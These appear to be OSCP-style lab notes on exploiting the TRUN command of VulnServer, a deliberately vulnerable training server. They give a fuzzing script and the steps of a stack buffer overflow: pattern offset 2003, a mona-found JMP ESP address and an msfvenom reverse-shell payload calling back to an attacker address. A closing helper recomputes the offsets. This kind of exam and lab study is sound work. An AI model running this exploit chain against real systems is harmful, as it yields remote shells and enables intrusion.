OSCP
VulnServer
vulnserver

#!/usr/bin/python

import socket

host = "ip"  # placeholder: address of the Windows lab machine
port = 9999

# Fuzzing request: the TRUN command followed by 5050 filler bytes
buffer = b"TRUN /.:/" + b"A" * 5050

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
Run the slmail server on the Windows machine
-> fuzz the application until it crashes; we found it crashed at 5050 bytes
-> then we need to check the offset (the actual value)
-> create a pattern: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050
-> put the pattern into the Python script and run it; we then found the EIP value: 386F4337
-> now check the offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 386F4337
-> the offset value we got is 2003
-> run the script with this offset and check whether the application crashes
-> after the crash, check for bad characters (ESP -> Follow in Dump) and remove them
-> once the bad characters are known, we need a JMP ESP address; we will use the mona module for this
-> !mona modules -> look for a module where DEP and ASLR are False and pick it, otherwise use the mona find command
-> !mona find -s "\xff\xe4" -m essfunc.dll
-> pick the first result and reverse its byte order:
   77131EFD          # Address retrieved from Mona results
   \xFD\x1E\x13\x77  # How it looks in your final exploit
-> now create the shellcode: msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.44.144 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f python
-> add the shellcode to the Python script and update the buffer value:
   buffer = b"TRUN /.:/" + b"A" * 2003 + b"\xFD\x1E\x13\x77" + b"C" * 16 + buf
-> run it -> boom
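Added example, not part of the original notes: a small Python sketch of what the pattern tools compute, useful when triaging a crash to see which input bytes ended up in EIP. It assumes the tool's default character sets (upper case, lower case, digit); the function names are made up for this illustration.

```python
import string
import struct


def pattern_create(length):
    """Build the cyclic Aa0Aa1Aa2... pattern (same layout as pattern_create.rb)."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    # 26 * 26 * 10 triples of 3 bytes each: beyond this the pattern repeats
    raise ValueError("pattern repeats after 20280 bytes; offsets become ambiguous")


def to_little_endian(value):
    """Pack a 32-bit value the way x86 stores it in memory (lowest byte first)."""
    return struct.pack("<I", value)


def pattern_offset(eip_hex, length):
    """Return the input offset whose 4 bytes were loaded into EIP, or -1."""
    # The debugger shows EIP as a number; in the input the bytes were reversed.
    needle = to_little_endian(int(eip_hex, 16)).decode("latin-1")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Values taken from the notes above.
    print(pattern_offset("386F4337", 5050))      # offset of the EIP overwrite
    print(pattern_create(5050)[2003:2007])       # the 4 pattern bytes at that offset
    print(to_little_endian(0x77131EFD).hex())    # mona address in memory order
```

A result of -1 means EIP did not come from the pattern, for example when the crash was produced with plain "A" filler.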